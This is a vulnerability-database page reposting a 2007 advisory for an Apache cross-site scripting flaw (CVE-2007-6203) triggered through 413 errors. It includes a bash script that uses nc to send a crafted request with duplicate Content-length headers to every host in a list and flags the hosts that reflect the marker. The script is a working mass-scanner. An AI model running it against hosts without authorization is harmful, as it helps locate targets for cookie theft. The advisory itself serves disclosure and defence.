Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2007-6203

Publish Date: 30 Nov 2007

                							

                source: http://www.securityfocus.com/bid/26663/info

Apache is prone to a cross-site scripting weakness when handling HTTP request methods that result in 413 HTTP errors.

An attacker may exploit this issue to steal cookie-based authentication credentials and launch other attacks.

Apache 2.0.46 through 2.2.4 are vulnerable; other versions may also be affected. 

#!/bin/bash
# PR07-37-scan
if [ $# -ne 1 ]
then
       echo "$0 &lt;hosts-file&gt;"
       exit
fi

for i in `cat $1`
do

if echo -en "&lt;PROCHECKUP&gt; / HTTP/1.1\nHost: $i\nConnection: 
close\nContent-length: 0\nContent-length: 0\n\n" | nc -w 4 $i 80 | grep 
-i '&lt;PROCHECKUP&gt;' &gt; /dev/null
then
       echo "$i is VULNERABLE!"
fi

done

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Apache 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting

Vulmon Search

About

Products

Connect